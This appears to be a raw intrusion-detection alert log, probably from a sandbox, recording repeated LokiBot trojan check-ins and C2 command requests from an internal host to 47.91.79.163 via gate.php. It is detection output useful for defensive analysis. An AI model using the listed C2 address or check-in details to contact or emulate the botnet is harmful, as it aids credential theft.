                                    12/03/20-10:04:02.064175TCP2025381ET TROJAN LokiBot Checkin4997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.064175TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.064175TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997180192.168.2.347.91.79.163
                                    12/03/20-10:04:02.206246TCP2025483ET TROJAN LokiBot Fake 404 Response804997147.91.79.163192.168.2.3
                                    12/03/20-10:04:02.431475TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.431475TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.431475TCP2025381ET TROJAN LokiBot Checkin4997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.431475TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.431475TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997280192.168.2.347.91.79.163
                                    12/03/20-10:04:02.490119TCP2025483ET TROJAN LokiBot Fake 404 Response804997247.91.79.163192.168.2.3
                                    12/03/20-10:04:02.710187TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.710187TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.710187TCP2025381ET TROJAN LokiBot Checkin4997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.710187TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.710187TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997380192.168.2.347.91.79.163
                                    12/03/20-10:04:02.770838TCP2025483ET TROJAN LokiBot Fake 404 Response804997347.91.79.163192.168.2.3
                                    12/03/20-10:04:02.991389TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997480192.168.2.347.91.79.163
                                    12/03/20-10:04:02.991389TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997480192.168.2.347.91.79.163
                                    12/03/20-10:04:02.991389TCP2025381ET TROJAN LokiBot Checkin4997480192.168.2.347.91.79.163
                                    12/03/20-10:04:02.991389TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997480192.168.2.347.91.79.163
                                    12/03/20-10:04:02.991389TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997480192.168.2.347.91.79.163
                                    12/03/20-10:04:03.052234TCP2025483ET TROJAN LokiBot Fake 404 Response804997447.91.79.163192.168.2.3
                                    12/03/20-10:04:03.285552TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.285552TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.285552TCP2025381ET TROJAN LokiBot Checkin4997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.285552TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.285552TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997580192.168.2.347.91.79.163
                                    12/03/20-10:04:03.344530TCP2025483ET TROJAN LokiBot Fake 404 Response804997547.91.79.163192.168.2.3
                                    12/03/20-10:04:03.554473TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.554473TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.554473TCP2025381ET TROJAN LokiBot Checkin4997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.554473TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.554473TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997680192.168.2.347.91.79.163
                                    12/03/20-10:04:03.614421TCP2025483ET TROJAN LokiBot Fake 404 Response804997647.91.79.163192.168.2.3
                                    12/03/20-10:04:03.844236TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.844236TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.844236TCP2025381ET TROJAN LokiBot Checkin4997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.844236TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.844236TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997780192.168.2.347.91.79.163
                                    12/03/20-10:04:03.907417TCP2025483ET TROJAN LokiBot Fake 404 Response804997747.91.79.163192.168.2.3
                                    12/03/20-10:04:04.123665TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.123665TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.123665TCP2025381ET TROJAN LokiBot Checkin4997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.123665TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.123665TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997880192.168.2.347.91.79.163
                                    12/03/20-10:04:04.184755TCP2025483ET TROJAN LokiBot Fake 404 Response804997847.91.79.163192.168.2.3
                                    12/03/20-10:04:04.413716TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.413716TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.413716TCP2025381ET TROJAN LokiBot Checkin4997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.413716TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.413716TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4997980192.168.2.347.91.79.163
                                    12/03/20-10:04:04.476197TCP2025483ET TROJAN LokiBot Fake 404 Response804997947.91.79.163192.168.2.3
                                    12/03/20-10:04:04.697742TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.697742TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.697742TCP2025381ET TROJAN LokiBot Checkin4998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.697742TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.697742TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998080192.168.2.347.91.79.163
                                    12/03/20-10:04:04.758396TCP2025483ET TROJAN LokiBot Fake 404 Response804998047.91.79.163192.168.2.3
                                    12/03/20-10:04:04.963596TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998180192.168.2.347.91.79.163
                                    12/03/20-10:04:04.963596TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998180192.168.2.347.91.79.163
                                    12/03/20-10:04:04.963596TCP2025381ET TROJAN LokiBot Checkin4998180192.168.2.347.91.79.163
                                    12/03/20-10:04:04.963596TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998180192.168.2.347.91.79.163
                                    12/03/20-10:04:04.963596TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998180192.168.2.347.91.79.163
                                    12/03/20-10:04:05.025184TCP2025483ET TROJAN LokiBot Fake 404 Response804998147.91.79.163192.168.2.3
                                    12/03/20-10:04:05.247696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.247696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.247696TCP2025381ET TROJAN LokiBot Checkin4998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.247696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.247696TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998280192.168.2.347.91.79.163
                                    12/03/20-10:04:05.306277TCP2025483ET TROJAN LokiBot Fake 404 Response804998247.91.79.163192.168.2.3
                                    12/03/20-10:04:05.532498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.532498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.532498TCP2025381ET TROJAN LokiBot Checkin4998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.532498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.532498TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998380192.168.2.347.91.79.163
                                    12/03/20-10:04:05.593428TCP2025483ET TROJAN LokiBot Fake 404 Response804998347.91.79.163192.168.2.3
                                    12/03/20-10:04:05.820293TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.820293TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.820293TCP2025381ET TROJAN LokiBot Checkin4998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.820293TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.820293TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998480192.168.2.347.91.79.163
                                    12/03/20-10:04:05.895039TCP2025483ET TROJAN LokiBot Fake 404 Response804998447.91.79.163192.168.2.3
                                    12/03/20-10:04:06.123173TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.123173TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.123173TCP2025381ET TROJAN LokiBot Checkin4998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.123173TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.123173TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998580192.168.2.347.91.79.163
                                    12/03/20-10:04:06.183388TCP2025483ET TROJAN LokiBot Fake 404 Response804998547.91.79.163192.168.2.3
                                    12/03/20-10:04:06.401192TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.401192TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.401192TCP2025381ET TROJAN LokiBot Checkin4998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.401192TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.401192TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998680192.168.2.347.91.79.163
                                    12/03/20-10:04:06.462903TCP2025483ET TROJAN LokiBot Fake 404 Response804998647.91.79.163192.168.2.3
                                    12/03/20-10:04:06.688485TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.688485TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.688485TCP2025381ET TROJAN LokiBot Checkin4998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.688485TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.688485TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998780192.168.2.347.91.79.163
                                    12/03/20-10:04:06.751387TCP2025483ET TROJAN LokiBot Fake 404 Response804998747.91.79.163192.168.2.3
                                    12/03/20-10:04:07.003231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.003231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.003231TCP2025381ET TROJAN LokiBot Checkin4998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.003231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.003231TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998880192.168.2.347.91.79.163
                                    12/03/20-10:04:07.064446TCP2025483ET TROJAN LokiBot Fake 404 Response804998847.91.79.163192.168.2.3
                                    12/03/20-10:04:07.279062TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.279062TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.279062TCP2025381ET TROJAN LokiBot Checkin4998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.279062TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.279062TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4998980192.168.2.347.91.79.163
                                    12/03/20-10:04:07.338927TCP2025483ET TROJAN LokiBot Fake 404 Response804998947.91.79.163192.168.2.3
                                    12/03/20-10:04:07.573982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.573982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.573982TCP2025381ET TROJAN LokiBot Checkin4999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.573982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.573982TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999080192.168.2.347.91.79.163
                                    12/03/20-10:04:07.634060TCP2025483ET TROJAN LokiBot Fake 404 Response804999047.91.79.163192.168.2.3
                                    12/03/20-10:04:07.858334TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999180192.168.2.347.91.79.163
                                    12/03/20-10:04:07.858334TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999180192.168.2.347.91.79.163
                                    12/03/20-10:04:07.858334TCP2025381ET TROJAN LokiBot Checkin4999180192.168.2.347.91.79.163
                                    12/03/20-10:04:07.858334TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999180192.168.2.347.91.79.163
                                    12/03/20-10:04:07.858334TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999180192.168.2.347.91.79.163
                                    12/03/20-10:04:08.050303TCP2025483ET TROJAN LokiBot Fake 404 Response804999147.91.79.163192.168.2.3
                                    12/03/20-10:04:08.266673TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.266673TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.266673TCP2025381ET TROJAN LokiBot Checkin4999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.266673TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.266673TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999280192.168.2.347.91.79.163
                                    12/03/20-10:04:08.326612TCP2025483ET TROJAN LokiBot Fake 404 Response804999247.91.79.163192.168.2.3
                                    12/03/20-10:04:08.547826TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.547826TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.547826TCP2025381ET TROJAN LokiBot Checkin4999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.547826TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.547826TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999380192.168.2.347.91.79.163
                                    12/03/20-10:04:08.606347TCP2025483ET TROJAN LokiBot Fake 404 Response804999347.91.79.163192.168.2.3
                                    12/03/20-10:04:08.827518TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.827518TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.827518TCP2025381ET TROJAN LokiBot Checkin4999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.827518TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.827518TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999580192.168.2.347.91.79.163
                                    12/03/20-10:04:08.888387TCP2025483ET TROJAN LokiBot Fake 404 Response804999547.91.79.163192.168.2.3
                                    12/03/20-10:04:09.106498TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.106498TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.106498TCP2025381ET TROJAN LokiBot Checkin4999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.106498TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.106498TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999680192.168.2.347.91.79.163
                                    12/03/20-10:04:09.171284TCP2025483ET TROJAN LokiBot Fake 404 Response804999647.91.79.163192.168.2.3
                                    12/03/20-10:04:09.374098TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.374098TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.374098TCP2025381ET TROJAN LokiBot Checkin4999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.374098TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.374098TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999780192.168.2.347.91.79.163
                                    12/03/20-10:04:09.432904TCP2025483ET TROJAN LokiBot Fake 404 Response804999747.91.79.163192.168.2.3
                                    12/03/20-10:04:09.662563TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.662563TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.662563TCP2025381ET TROJAN LokiBot Checkin4999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.662563TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.662563TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer4999980192.168.2.347.91.79.163
                                    12/03/20-10:04:09.725847TCP2025483ET TROJAN LokiBot Fake 404 Response804999947.91.79.163192.168.2.3
                                    12/03/20-10:04:09.951988TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.2.347.91.79.163
                                    12/03/20-10:04:09.951988TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.2.347.91.79.163
                                    12/03/20-10:04:09.951988TCP2025381ET TROJAN LokiBot Checkin5000080192.168.2.347.91.79.163
                                    12/03/20-10:04:09.951988TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.2.347.91.79.163
                                    12/03/20-10:04:09.951988TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000080192.168.2.347.91.79.163
                                    12/03/20-10:04:10.009026TCP2025483ET TROJAN LokiBot Fake 404 Response805000047.91.79.163192.168.2.3
                                    12/03/20-10:04:10.243520TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.243520TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.243520TCP2025381ET TROJAN LokiBot Checkin5000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.243520TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.243520TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000180192.168.2.347.91.79.163
                                    12/03/20-10:04:10.302791TCP2025483ET TROJAN LokiBot Fake 404 Response805000147.91.79.163192.168.2.3
                                    12/03/20-10:04:10.507912TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.507912TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.507912TCP2025381ET TROJAN LokiBot Checkin5000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.507912TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.507912TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000280192.168.2.347.91.79.163
                                    12/03/20-10:04:10.569188TCP2025483ET TROJAN LokiBot Fake 404 Response805000247.91.79.163192.168.2.3
                                    12/03/20-10:04:10.788542TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.788542TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.788542TCP2025381ET TROJAN LokiBot Checkin5000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.788542TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.788542TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000380192.168.2.347.91.79.163
                                    12/03/20-10:04:10.861552TCP2025483ET TROJAN LokiBot Fake 404 Response805000347.91.79.163192.168.2.3
                                    12/03/20-10:04:11.075915TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.075915TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.075915TCP2025381ET TROJAN LokiBot Checkin5000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.075915TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.075915TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000480192.168.2.347.91.79.163
                                    12/03/20-10:04:11.206683TCP2025483ET TROJAN LokiBot Fake 404 Response805000447.91.79.163192.168.2.3
                                    12/03/20-10:04:11.442584TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.442584TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.442584TCP2025381ET TROJAN LokiBot Checkin5000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.442584TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.442584TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000580192.168.2.347.91.79.163
                                    12/03/20-10:04:11.511031TCP2025483ET TROJAN LokiBot Fake 404 Response805000547.91.79.163192.168.2.3
                                    12/03/20-10:04:11.722307TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.722307TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.722307TCP2025381ET TROJAN LokiBot Checkin5000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.722307TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.722307TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000680192.168.2.347.91.79.163
                                    12/03/20-10:04:11.775321TCP2025483ET TROJAN LokiBot Fake 404 Response805000647.91.79.163192.168.2.3
                                    12/03/20-10:04:11.992416TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.2.347.91.79.163
                                    12/03/20-10:04:11.992416TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.2.347.91.79.163
                                    12/03/20-10:04:11.992416TCP2025381ET TROJAN LokiBot Checkin5000780192.168.2.347.91.79.163
                                    12/03/20-10:04:11.992416TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.2.347.91.79.163
                                    12/03/20-10:04:11.992416TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000780192.168.2.347.91.79.163
                                    12/03/20-10:04:12.055451TCP2025483ET TROJAN LokiBot Fake 404 Response805000747.91.79.163192.168.2.3
                                    12/03/20-10:04:12.296639TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.296639TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.296639TCP2025381ET TROJAN LokiBot Checkin5000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.296639TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.296639TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000880192.168.2.347.91.79.163
                                    12/03/20-10:04:12.396987TCP2025483ET TROJAN LokiBot Fake 404 Response805000847.91.79.163192.168.2.3
                                    12/03/20-10:04:12.634507TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.634507TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.634507TCP2025381ET TROJAN LokiBot Checkin5000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.634507TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.634507TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5000980192.168.2.347.91.79.163
                                    12/03/20-10:04:12.694489TCP2025483ET TROJAN LokiBot Fake 404 Response805000947.91.79.163192.168.2.3
                                    12/03/20-10:04:12.913600TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.913600TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.913600TCP2025381ET TROJAN LokiBot Checkin5001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.913600TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.913600TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001080192.168.2.347.91.79.163
                                    12/03/20-10:04:12.980753TCP2025483ET TROJAN LokiBot Fake 404 Response805001047.91.79.163192.168.2.3
                                    12/03/20-10:04:13.192843TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.192843TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.192843TCP2025381ET TROJAN LokiBot Checkin5001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.192843TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.192843TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001180192.168.2.347.91.79.163
                                    12/03/20-10:04:13.277597TCP2025483ET TROJAN LokiBot Fake 404 Response805001147.91.79.163192.168.2.3
                                    12/03/20-10:04:13.509328TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.509328TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.509328TCP2025381ET TROJAN LokiBot Checkin5001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.509328TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.2.347.91.79.163
                                    12/03/20-10:04:13.509328TCP2017930ET TROJAN Trojan Generic - POST To gate.php with no referer5001280192.168.2.347.91.79.163
